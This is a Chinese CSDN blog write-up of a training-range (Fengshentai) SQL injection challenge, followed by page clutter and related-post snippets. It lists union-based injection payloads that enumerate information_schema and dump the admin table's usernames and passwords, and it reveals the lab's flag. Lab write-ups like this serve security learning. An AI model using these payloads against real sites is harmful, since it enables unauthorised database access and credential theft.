第一章：为了女神小芳！

PGone~

已于 2022-12-13 16:33:59 修改

阅读量177

点赞数 1

分类专栏： # 封神台靶场文章标签：网络安全测试工具 web安全

于 2022-12-13 16:28:34 首次发布

本文链接：https://blog.csdn.net/m0_51195235/article/details/128304012

版权

封神台靶场专栏收录该内容

5 篇文章 0 订阅

订阅专栏

1.得到站点目标

2.打开已给网站并查找注入点

3.进行测试

and 1 = 1   # 页面显示正常
and 1 = 2   # 页面显示异常

4.查询字段数

?id=1 order by 3  # 页面显示异常
?id=1 order by 2  # 页面显示正常

5.查看返回值

?id=4 union select 1,2#

6.常见信息查询

?id=4 union select 1,database()#        maoshe
?id=4 union select 1,user()#            maoshe@localhost 
?id=4 union select 1,version()#         5.5.53 存在information_schema数据库

7.查看数据库下的表

?id=4 union select 1,group_concat(table_name) from information_schema.tables where table_schema='maoshe'#
关键信息   admin表

8.查看表下的列名

?id=4 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#

9.查看列下的具体数据

?id=4 union select 1,group_concat(id,username,password) from admin #

10.得到目标flag

hellohack

11.总结

（1）先测试是否存在注入点

（2）再查看返回点

（3）从数据库到表到列名最后到具体数据，一步一步

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

PGone~

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
第一章：为了女神小芳！

第一章：为了女神小芳！
复制链接

扫一扫

专栏目录

封神台靶场-第一章：为了女神小芳！【SQL注入攻击原理】

红凳子的博客

05-07

2077

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档封神台靶场-第一章：为了女神小芳！【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结前言提示：通过sql注入拿到管理员密码！尤里正在追女神小芳，在得知小芳开了一家公司后，尤里通过whois查询发现了小芳公司网站，学过一点黑客技术的他，想在女神面前炫炫技。于是他打开了传送门判断是否存在SQL注入漏洞示例：pandas 是基于NumPy 的一种工具，该工具是为了解决数据分析任务而创建的。二

第一章：为了女神小芳

m0_59205095的博客

05-16

2240

第一章：为了女神小芳通过sql注入拿到管理员密码！尤里正在追女神小芳，在得知小芳开了一家公司后，尤里通过whois查询发现了小芳公司网站学过一点黑客技术的他，想在女神面前炫炫技。于是他打开了宠物猫异国短毛猫纯种猫加菲猫波斯猫辛巴猫舍纯种双色/梵文波斯、异国小猫 CFA注册猫舍 (aqlab.cn) 实验工具 sqlmap 实验环境 kali 1.判断是否存在注入点，页面显示如图所示可能存在sql注入点 http://rhiq8003.ia.aqlab.cn/?id=1and%

参与评论您还未登录，请先登录后发表或查看评论

封神台靶场 第一章：为了女神小芳（SQL注入）

m0_65712192的博客

10-14

1761

封神台靶场 第一章：为了女神小芳（SQL注入）

第一章：为了女神小芳！【配套课时：SQL注入攻击原理实战演练】

weixin_54055099的博客

07-31

389

数值型GET注入漏洞

封神台在线靶场——第一章:为了女神小芳!

pigzlfa的博客

10-10

417

sql注入基础版。

封神台第一章：为了女神小芳

qq_51459600的博客

12-22

517

实验平台：封神台-掌控安全在线演练靶场 第一章：为了女神小芳! 传送门：http://rhiq8003.ia.aqlab.cn/ 实验目标：获取admin的密码点击查看新闻1，跳转到http://rhiq8003.ia.aqlab.cn/?id=1 发现传递的参数名为id 判断有无注入点 http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 未显示出新闻内容，说明存在注入点判断查询字段数 http://rhiq8003.ia.aqlab.cn/

封神台靶场 第一章：为了女神小芳！writeup

热门推荐

Sk1y的博客

02-15

2万+

封神台靶场 第一章：为了女神小芳！题目简述：封神台靶场，题目链接解题过程：首先是这样的url为： http://59.63.200.79:8003/ 当点击点击查看新闻时，相应的url变化，变为如下： http://59.63.200.79:8003/?id=1 ...

封神台-第一章：为了女神小芳！

qq_64409509的博客

06-02

110

封神台-第一章：为了女神小芳

封神台靶场（一）为了女神小芳【SQL注入攻击】（超级详细）

xiao_mai_的博客

05-11

956

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好！这是你第一次使用 Markdown编辑器所展示的欢迎页。如果你想学习如何使用Mar

北师大版一年级数学上册小芳的上午习题第2课时.pdf

10-14

6. **时间单位的应用**：在提高题部分，孩子们需要为不同情境选择合适的时间单位，如一节课通常为40分钟，小学生每天在校时间为6小时，工作日通常工作8小时，从上海到北京的火车旅程需要17小时，步行到学校的平均...

封神台sql注入---第一章节: 为了女神小芳

qq_52573109的博客

09-14

806

1:靶场链接: https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7 2:解题过程: (1):打开传送门，点击"点击查看新闻"发现url出现参数 id = 1,猜测为注入点。（2):判断字段个数: 注入代码： order by 2 ...

尤里的复仇Ⅰ 小芳！

HNU凌风的博客

03-10

769

第一章：为了女神小芳！ Tips: 通过sql注入拿到管理员密码！尤里正在追女神小芳，在得知小芳开了一家公司后，尤里通过whois查询发现了小芳公司网站学过一点黑客技术的他，想在女神面前炫炫技。于是他打开了传送门(小芳公司网站). 第一步，判断是否存在sql注入漏洞在网站后构造?id=1 and 1=1 ，然后回车页面返回正常再次构造 ?id=1 and 1=2 然后回车这里页面返回异常，初步判断这里可能存在一个sql注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 or

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8455

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

Java学习Day41：骑龙救！（springMVC）

最新发布

weixin_51721783的博客

09-11

228

小案例：1.导入依赖2.使用@controller定义Bean，并定义访问路径3.创建springmvc的配置文件，加载controller 对应的bean4.定义一个servlet容器启动的配置类，在里面加载spring的配置。

SpringMVC重点功能底层源码解析

业精于勤荒于嬉，行成于思毁于随

09-06

1580

SpringMVC在进行把String转成User对象时，会先判断有没有User类型对应的StringToUserEditor，如果有就会利用它来把String转成User对象，如果没有则会找User类中有没有String类型参数的构造方法，如果有则用该构造方法来构造出User对象。

SpringMVC基于注解使用：JSON

kkkkkkkok的博客

09-06

703

01-json处理--介绍 json数据格式回顾：在pom.xml导入依赖在web.xml里面导入配置文件 @ResponseBody 注解是将返回值作为文本返回到客户端了而不是字符串了当我们想返回bean对象的json数据的时候我们需要先导入jackson依赖在pom.xml里面然后创建User类，然后创建方法在方法上加入@ResponseBody注解用list存储json数据处了在方法上加@ResponseBody注解还可以在类上面把@

slf4j依赖冲突处理

wzp1986的专栏

09-11

251

处理spring应用、hive3的日志输出

SpringMVC；MVC模式；Spring环境搭建；

weixin_72637723的博客

09-08

1053

MVC模式：1.M:model 模型,业务模型和数据模型.2.C:controller 控制器3.V:view 视图优点:使用控制器C把视图V和业务模型M分离，从而使同一个程序可以使用不同的表现形式使用场景:中大型项目核心:控制器。

iOS移动终端图像加密技术：一种混沌序列方案

“基于iOS的移动智能终端图像加密技术研究与实现”是一篇由刘小芳和马兆丰共同撰写的科技论文，该研究探讨了在移动智能设备，特别是iOS平台上，如何有效保护图像信息安全的问题。文章指出随着移动智能终端的普及，...